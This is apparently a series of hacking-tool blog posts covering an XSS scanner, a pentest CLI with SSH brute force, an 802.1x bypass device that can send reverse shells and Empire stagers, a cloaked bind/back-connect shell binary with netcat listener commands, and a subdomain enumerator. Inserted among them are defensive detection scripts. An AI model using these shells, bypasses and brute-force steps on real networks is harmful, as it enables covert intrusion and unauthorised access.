<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">brew install --cask chromedriver</span><br />
<br />
Alternatively, find a version for other operating systems here: <span style="font-family: "courier new" , "courier" , monospace;">https://sites.google.com/a/chromium.org/chromedriver/downloads</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>Run the command:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip3 install -r requirements.txt</span><br />
<br />
<b>Running Traxss</b><br />
Traxss can be started with the command:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python3 traxss.py</span><br />
<br />
This will launch an interactive CLI to guide you through the process.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Types of Scans</span></h3>
<h3 style="text-align: left;">
<span style="color: #073763;">Full Scan with HTML</span></h3>
Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS vulnerabilities (this feature is still in beta).<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Full Scan w/o HTML</span></h3>
This scan will run the query scan only.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Fast Scan with HTML</span></h3>
This scan is the same as the full scan with HTML, but it will only use 7 attack vectors rather than the 575+ vectors.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Fast Scan w/o HTML</span></h3>
This scan is the same as the full scan w/o HTML, but it will only use 7 attack vectors rather than the 575+ vectors.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Contributing</span></h3>
Thank you for your interest! All types of contributions are welcome.<br />
<ul style="text-align: left;">
<li>Fork and clone this repository</li>
<li>Create your branch from the master branch</li>
<li>Please open your PR with the master branch as the base</li>
</ul>
<br />
<span style="font-size: large;"><a href="https://github.com/M4cs/traxss" target="_blank">Download TraXSS</a></span></div>
Posted by HackersOnlineClub.
Penta - Open Source All-in-one CLI To Automate Pentesting (published 2019-10-11, updated 2020-03-31)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO81qxE_2wFs5bR6Vbh3pG0QOo0_1bcUQJ9B7W4tNZFQsoGo7hpFuAiu9Q0PbpJzKccM_FejWeqBmVKP0fb78oZMIOu4Foi3r36fXA1aSmLM_qPRqbgzOkt3cYp2M6VAnsLK9lBXK8VgrJ/s1600/Penta.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="702" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO81qxE_2wFs5bR6Vbh3pG0QOo0_1bcUQJ9B7W4tNZFQsoGo7hpFuAiu9Q0PbpJzKccM_FejWeqBmVKP0fb78oZMIOu4Foi3r36fXA1aSmLM_qPRqbgzOkt3cYp2M6VAnsLK9lBXK8VgrJ/s1600/Penta.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Penta (PENTest + Automation tool) is Pentest automation tool using Python3.</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>Install requirements</b><br />
penta requires the following packages.<br />
<ul style="text-align: left;">
<li>Python3.7</li>
<li>pipenv</li>
</ul>
<br />
Resolve the Python package dependencies:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pipenv install</span><br />
<br />
If you dislike pipenv:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pip install -r requirements.txt</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pipenv run start &lt;options&gt;</span><br />
<br />
If you dislike pipenv...<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ python penta/penta.py</span><br />
<br />
<b>Usage: List options</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pipenv run start -h</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]</span><br />
<br />
Penta is Pentest automation tool.<br />
<br />
<b>optional arguments:</b><br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -h, --help show this help message and exit</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -target TARGET Specify target IP / domain</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -ports PORTS Please, specify the target port(s) separated by comma.</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Default: 21,22,25,80,110,443,8080</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -proxy PROXY Proxy[IP:PORT]</span></li>
</ul>
<br />
<b>Usage: Main menu</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[ ] === MENU LIST =================================</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[0] EXIT</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[1] Port scanning Default: 21,22,25,80,110,443,8080</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[2] Nmap & vuln scanning</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[3] Check HTTP option methods</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[4] Grab DNS server info</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[5] Shodan host search</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[6] FTP connect with anonymous</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[7] SSH connect with Brute Force</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[99] Change target host</span><br />
<br />
<b>1. Port scanning</b><br />
To check ports for a target. Log output supported.<br />
<br />
<b>2. Nmap &amp; vuln scanning</b><br />
To check ports by additional means using nmap.<br />
<br />
<b>3. Check HTTP option methods</b><br />
To check the methods (e.g. GET,POST) for a target.<br />
<br />
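A self-contained version of the HTTP methods check above, added here as an example and not taken from Penta. It sends OPTIONS, parses the Allow header and reports the methods a hardening review normally wants disabled. The local server, its Allow list and the RISKY_METHODS set are constructed assumptions of this example, so it runs offline.<br />

```python
"""Check which HTTP methods a server advertises via OPTIONS.

Added example (not Penta's code). A constructed local server answers OPTIONS
so the check can run offline; the set of methods flagged as risky is an
assumption of this example.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Methods that normally should not be enabled on a production web server.
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}


def check_http_methods(host: str, port: int, path: str = "/", timeout: float = 5.0) -> dict:
    """Send OPTIONS and parse the Allow header into a sorted list of methods.

    Returns {'status': int, 'allowed': [...], 'risky': [...]}.
    An absent Allow header yields an empty list rather than an error.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        allow = resp.getheader("Allow") or ""
        resp.read()  # drain the body so the connection closes cleanly
    finally:
        conn.close()
    allowed = sorted({m.strip().upper() for m in allow.split(",") if m.strip()})
    return {"status": resp.status,
            "allowed": allowed,
            "risky": sorted(set(allowed) & RISKY_METHODS)}


class _ConstructedHandler(BaseHTTPRequestHandler):
    """Constructed server that advertises a deliberately permissive method set."""

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", "GET, HEAD, POST, OPTIONS, PUT, DELETE, TRACE")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_constructed_server() -> HTTPServer:
    """Start the constructed server on an ephemeral loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), _ConstructedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_constructed_server()
    try:
        print(check_http_methods("127.0.0.1", srv.server_port))
    finally:
        srv.shutdown()
```

Against a real host, pass its address and port to check_http_methods; a server that does not answer OPTIONS simply returns an empty allowed list, which is itself worth noting in a report.<br />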
<b>4. Grab DNS server info</b><br />
To show the info about DNS server.<br />
<br />
<b>5. Shodan host search</b><br />
To collect host service info from Shodan. Request a <a href="https://developer.shodan.io/" target="_blank">Shodan API key</a> to enable this feature.<br />
<br />
<b>6. FTP connect with anonymous</b><br />
To check whether anonymous access is enabled on port 21. FTP users can authenticate themselves using the plain-text sign-in protocol (typically a username and password), but they can connect anonymously if the server is configured to allow it.<br />
<br />
Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.<br />
<br />
<b>7. SSH connect with Brute Force</b><br />
To check the SSH connection by scanning with brute force. Dictionary data is in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">data/dict</span>.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/takuzoo3868/penta" target="_blank">Download Now</a></span></div>
Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass (published 2019-09-23)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9EP5Uq3H4k6qtHCngV7UHk7IvyPzqaNQTzCtZavULEKW53rCsWKRSXJYQi84feoIBfHOCJAzG3uXf86hTDp_pLEId0cN3-VSWUjp2YGGS5492E_gf3L3yAUTSxOFNbabNW5F0PjrgapOf/s1600/Dolos+Cloak.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="661" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9EP5Uq3H4k6qtHCngV7UHk7IvyPzqaNQTzCtZavULEKW53rCsWKRSXJYQi84feoIBfHOCJAzG3uXf86hTDp_pLEId0cN3-VSWUjp2YGGS5492E_gf3L3yAUTSxOFNbabNW5F0PjrgapOf/s1600/Dolos+Cloak.png" /></a></div>
<h3 style="text-align: left;">
<span style="color: #073763;"><br /></span></h3>
<h2 style="text-align: left;">
<span style="color: #073763;">Dolos Cloak- Automated 802.1x Bypass</span></h2>
<br />
Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.<br />
<br />
The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">How it Works</span></h3>
Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.<br />
<br />
Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.<br />
<br />
In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.<br />
<br />
Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.<br />
<br />
Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.<br />
<br />
At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.<br />
<br />
For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.<br />
<br />
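From the defender's side, the DHCP request described above is one of the few artefacts this technique leaves on the wire: a MAC that already holds a lease asks again, presenting whatever hostname and vendor class the Odroid's own DHCP client uses. The following is an added example, not part of Dolos Cloak. Its log format, field names and sample lines are constructed, and the heuristic itself is an assumption to be tuned against real DHCP server logs.<br />

```python
"""Detection-side example: a cloned MAC/IP that then issues its own DHCP
request. Added example, not Dolos Cloak code.

The log format is constructed for this example; real DHCP servers log
differently, so the regex would need adapting. The heuristic is an
assumption: a DHCP request from a MAC that already holds a lease, presenting
a different hostname or vendor class, deserves a look.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^(?P<ts>\S+) DHCPREQUEST mac=(?P<mac>[0-9a-f:]{17}) ip=(?P<ip>\S+) "
    r"hostname=(?P<host>\S+) vendor=(?P<vendor>\S+)$"
)

# Constructed sample: a desktop renews normally, then the same MAC asks for an
# address while presenting a different hostname and vendor class.
SAMPLE_LOG = """\
2019-09-23T09:00:01 DHCPREQUEST mac=aa:bb:cc:dd:ee:01 ip=10.0.1.20 hostname=desk-0421 vendor=MSFT_5.0
2019-09-23T09:00:05 DHCPREQUEST mac=aa:bb:cc:dd:ee:02 ip=10.0.1.21 hostname=printer-3f vendor=HP-Printer
2019-09-23T13:00:01 DHCPREQUEST mac=aa:bb:cc:dd:ee:01 ip=10.0.1.20 hostname=desk-0421 vendor=MSFT_5.0
2019-09-23T13:07:44 DHCPREQUEST mac=aa:bb:cc:dd:ee:01 ip=10.0.1.20 hostname=odroid vendor=dhclient
"""


@dataclass
class Alert:
    ts: str
    mac: str
    ip: str
    reason: str


def detect_lease_identity_changes(log_text: str) -> list[Alert]:
    """Flag DHCP requests where a known MAC changes hostname or vendor class.

    The first (hostname, vendor) seen per MAC is kept as its identity;
    renewals that repeat the identity are normal and produce no alert.
    """
    identity: dict[str, tuple[str, str]] = {}
    alerts: list[Alert] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsed lines are skipped, not treated as errors
        mac, host, vendor = m["mac"], m["host"], m["vendor"]
        if mac not in identity:
            identity[mac] = (host, vendor)
            continue
        known_host, known_vendor = identity[mac]
        changes = []
        if host != known_host:
            changes.append(f"hostname {known_host} -> {host}")
        if vendor != known_vendor:
            changes.append(f"vendor {known_vendor} -> {vendor}")
        if changes:
            alerts.append(Alert(m["ts"], mac, m["ip"], "; ".join(changes)))
    return alerts


if __name__ == "__main__":
    for a in detect_lease_identity_changes(SAMPLE_LOG):
        print(a)
```

Correlating such an alert with the switch port's 802.1x session (one authenticated supplicant, but a second stack behind the same MAC) is what turns the heuristic into a finding; the Tips section's note that some NAC products probe ports 445, 443 and 80 points at the same idea from the NAC vendor's side.<br />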
<h3 style="text-align: left;">
<span style="color: #073763;">Installation and Usage</span></h3>
<ul style="text-align: left;">
<li>Perform default install of Kali ARM on Odroid C2. </li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">ssh root@169.254.44.44</span><br />
<ul style="text-align: left;">
<li>Be sure to save this project to /root/tools/dolos_cloak</li>
<li>Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">dhclient usbnet0</span><br />
<ul style="text-align: left;">
<li>Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd setup</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./setup.sh</span><br />
<ul style="text-align: left;">
<li>You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.</li>
<li>Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.</li>
<li>Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them; the script should be able to figure this out for us. Set these options only if you know their values for sure. The management_int, domain_name, and dns_server options are placeholders for now but will be useful very soon. For shells, you can set up a custom autorun command in config.yaml to run once the man-in-the-middle attack has autoconfigured. You can also set up a cron job to send back shells.</li>
<li>Connect two USB ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode).</li>
<li>Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.</li>
<li>PWN N00BZ, get $$$, have fun, hack the planet</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Tips</span></h3>
<ul style="text-align: left;">
<li>Mod and run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./scripts/upgrade_to_vpn.sh</span> to turn a stealthy Empire agent into a full blown VPN tunnel</li>
<li>Mod and run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./scripts/reverse_listener_setup.sh</span> to set up a port for a reverse listener on the device.</li>
<li>Run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./scripts/responder_setup.sh</span> to allow control of the protocols that we capture for responder. You should run responder on the bridge interface:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">responder -I mibr</span><br />
<ul style="text-align: left;">
<li>Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.</li>
<li>Logs help when autosniff.py misbehaves. The rc.local is set to store the current session's logs in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./logs/session.log</span> and the history in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./logs/history.log</span>, so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all the bash commands used to set up the NAT ninja magic.</li>
</ul>
<br />
<span style="font-size: large;"><a href="https://github.com/fkasler/dolos_cloak" target="_blank">Download Dolos Cloak</a></span></div>
PostShell - Post Exploitation Bind/Backconnect Shell (published 2019-09-10)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinB94D7q_Ld-Yl2oKLBcH6cJNeAT9LvEPAvYkpb7eYP7jan0by9SzjW5mZCQcE2lBP616Vcf_sNPwk9dJTII4XcydjBL-Jn03FnI23mjIKbISoELqMCSNqesec7yBljjr9YsJpCY7yrZiG/s1600/PostShell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="873" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinB94D7q_Ld-Yl2oKLBcH6cJNeAT9LvEPAvYkpb7eYP7jan0by9SzjW5mZCQcE2lBP616Vcf_sNPwk9dJTII4XcydjBL-Jn03FnI23mjIKbISoELqMCSNqesec7yBljjr9YsJpCY7yrZiG/s640/PostShell.png" width="640" /></a></div>
<h3 style="text-align: left;">
<span style="color: #073763;"><br /></span></h3>
<h3 style="text-align: left;">
<span style="color: #073763;">PostShell - Post Exploitation Bind/Backconnect Shell</span></h3>
<br />
PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.<br />
<br />
The stub size is around 14kb and it can be compiled on any Unix-like system. The screenshot above shows the banner and the interaction with the shell after a connection is started.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Why not use a traditional Backconnect/Bind Shell?</span></h3>
PostShell allows for easier post-exploitation by making the attacker less reliant on dependencies such as Python and Perl.<br />
<br />
It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.<br />
<br />
PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<ul style="text-align: left;">
<li>Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.</li>
<li>Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.</li>
<li>TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.</li>
<li>Bind/Backconnect shell, both a bind shell and back connect can be created.</li>
<li>Small Stub Size, a very small stub (&lt;14kb) is usually generated.</li>
<li>Automatically Daemonizes</li>
<li>Tries to set GUID/UID to 0 (root)</li>
</ul>
<br />
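The cloaked process name above is what ps and top show, but on Linux the kernel still records the real binary in /proc/&lt;pid&gt;/exe, which a process cannot rewrite. The following hunting check compares the visible names with that path. It is an added example, not PostShell code; the process views in SAMPLE_VIEWS are constructed, and the live scan at the bottom only works on a Linux host with /proc.<br />

```python
"""Hunting for processes whose visible name disagrees with their on-disk
binary, the artefact that process-name cloaking leaves behind.
Added example, not PostShell code.

On Linux the kernel keeps the real executable path in /proc/<pid>/exe
regardless of what a process writes over its argv or comm; comparing the
names is the check. The sample file names and argv values are constructed.
"""
from __future__ import annotations

import os
from dataclasses import dataclass


@dataclass
class ProcView:
    pid: int
    argv0: str   # what ps shows; overwritable by the process
    comm: str    # /proc/<pid>/comm, 15 chars max, settable via prctl
    exe: str     # /proc/<pid>/exe symlink target, kernel-controlled


def _basename(path: str) -> str:
    return os.path.basename(path.rstrip("/"))


def is_name_mismatch(p: ProcView) -> bool:
    """True when neither argv[0] nor comm agrees with the real executable name.

    Interpreters are a normal source of disagreement (argv[0] 'python3' for a
    script run as python3.11), so a caller should allow-list those; this
    function reports raw mismatches only. A ' (deleted)' suffix on exe is
    stripped for the comparison but is itself a sign worth reporting: the
    binary was removed after launch.
    """
    real = _basename(p.exe.replace(" (deleted)", ""))
    return _basename(p.argv0) != real and p.comm != real[:15]


def snapshot_proc(pid: int) -> ProcView | None:
    """Read the three names for one live process from /proc; None if unreadable."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/cmdline", "rb") as f:
            argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
        with open(f"{base}/comm") as f:
            comm = f.read().strip()
        exe = os.readlink(f"{base}/exe")
    except OSError:
        return None
    return ProcView(pid, argv0, comm, exe)


def find_mismatches(views: list[ProcView]) -> list[int]:
    """PIDs of the given views whose names disagree with their binary."""
    return [v.pid for v in views if is_name_mismatch(v)]


# Constructed sample views: a normal daemon, and a binary presenting itself
# as a system service while actually running from a different file.
SAMPLE_VIEWS = [
    ProcView(801, "/usr/sbin/sshd", "sshd", "/usr/sbin/sshd"),
    ProcView(2217, "/usr/lib/systemd/systemd-journald", "systemd-journal",
             "/tmp/.cache/stub"),
]

if __name__ == "__main__":
    print("constructed sample:", find_mismatches(SAMPLE_VIEWS))
    live = [v for v in (snapshot_proc(int(d)) for d in os.listdir("/proc") if d.isdigit()) if v]
    print("live mismatches:", find_mismatches(live))
```

Reading another user's /proc/&lt;pid&gt;/exe needs the same UID or root, which is why the live scan is meant to be run as root by a responder; the "tries to set UID to 0" feature above is a reminder that the process under investigation may have done the same.<br />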
<h3 style="text-align: left;">
<span style="color: #073763;">Getting Started</span></h3>
<ol style="text-align: left;">
<li>Downloading: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/rek7/postshell</span></li>
<li>Compiling: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd postshell &amp;&amp; sh compile.sh</span>. This should create a binary called "stub"; this is the malware.</li>
</ol>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Commands</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ ./stub</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Bind Shell Usage: ./stub port</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Back Connect Usage: ./stub ip port</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Example Usage</span></h3>
<b>Backconnect:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ ./stub 127.0.0.1 13377</span><br />
<br />
<b>Bind Shell:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ ./stub 13377</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Receiving a Connection with Netcat</span></h3>
<br />
<b>Receiving a backconnect:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ nc -vlp port</span><br />
<br />
<b>Connecting to a bind Shell:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ nc host port</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">TODO:</span></h3>
Add domain resolution<br />
<br />
<span style="font-size: large;"><a href="https://github.com/rek7/postshell" target="_blank">Download PostShell</a></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<i><span style="font-family: Courier New, Courier, monospace;"><b>Disclaimer: </b>These scripts are for knowledge purposes only</span></i></div>
Findomain- Fastest And Cross-platform Subdomain Enumerator (published 2019-08-24, updated 2020-06-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSbZkjOAxv9oxToj0Y36V1K0WPLBPWUmLfXo3WHzU4u8g9oMVVDnWNwglvq5Wh_sQCqIH6CMh2_Q77GA7WEhZECJvDcPvuYfLIFLV3QhxPZZ35F7QeTmTYvxafsa0WfhY0R68yq_fKu6OX/s1600/Findomain.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="412" data-original-width="646" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSbZkjOAxv9oxToj0Y36V1K0WPLBPWUmLfXo3WHzU4u8g9oMVVDnWNwglvq5Wh_sQCqIH6CMh2_Q77GA7WEhZECJvDcPvuYfLIFLV3QhxPZZ35F7QeTmTYvxafsa0WfhY0R68yq_fKu6OX/s1600/Findomain.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">FinDomain- Fastest And Cross-platform Subdomain Enumerator.</span></h2>
<br />
<b>Comparison</b><br />
This comparison gives you an idea of why you should use Findomain instead of other enumerators. The domain used for the test was Microsoft.com, on the following BlackArch virtual machine:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>Host:</b> KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>Kernel:</b> 5.2.6-arch1-1-ARCH</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>CPU:</b> Intel (Skylake, IBRS) (4) @ 2.904GHz</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><b>Memory:</b> 139MiB / 3943MiB</span><br />
<br />
The times were measured with the Linux time command.<br />
<br />
<b><span style="color: #073763;">You can see all the details of the tests in this link.</span></b><br />
<br />
<table border="1" cellpadding="3" cellspacing="0" style="border-collapse: collapse; font-family: arial; font-size: 10pt;">
<tbody>
<tr><td style="font-weight: bold; text-align: center;">Enumeration Tool</td><td style="font-weight: bold; text-align: center;">Search Time</td><td style="font-weight: bold; text-align: center;">Total Subdomains Found</td><td style="font-weight: bold; text-align: center;">CPU Usage</td><td style="font-weight: bold; text-align: center;">RAM Usage</td></tr>
<tr><td style="text-align: center;">Findomain</td><td style="text-align: center;">real 0m38.701s</td><td style="text-align: center;">5622</td><td style="text-align: center;">Very Low</td><td style="text-align: center;">Very Low</td></tr>
<tr><td style="text-align: center;">assetfinder</td><td style="text-align: center;">real 6m1.117s</td><td style="text-align: center;">4630</td><td style="text-align: center;">Very Low</td><td style="text-align: center;">Very Low</td></tr>
<tr><td style="text-align: center;">Subl1st3r</td><td style="text-align: center;">real 7m14.996s</td><td style="text-align: center;">996</td><td style="text-align: center;">Low</td><td style="text-align: center;">Low</td></tr>
<tr><td style="text-align: center;">Amass*</td><td style="text-align: center;">real 29m20.301s</td><td style="text-align: center;">332</td><td style="text-align: center;">Very High</td><td style="text-align: center;">Very High</td></tr>
</tbody></table>
<br />
* I can't wait for the Amass test to finish; it looks like it will never end, and additionally the resource usage is very high.<br />
<br />
<b>Note: </b>The benchmark was made on 10/08/2019; since that point the other tools may have improved, and you may get different results.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
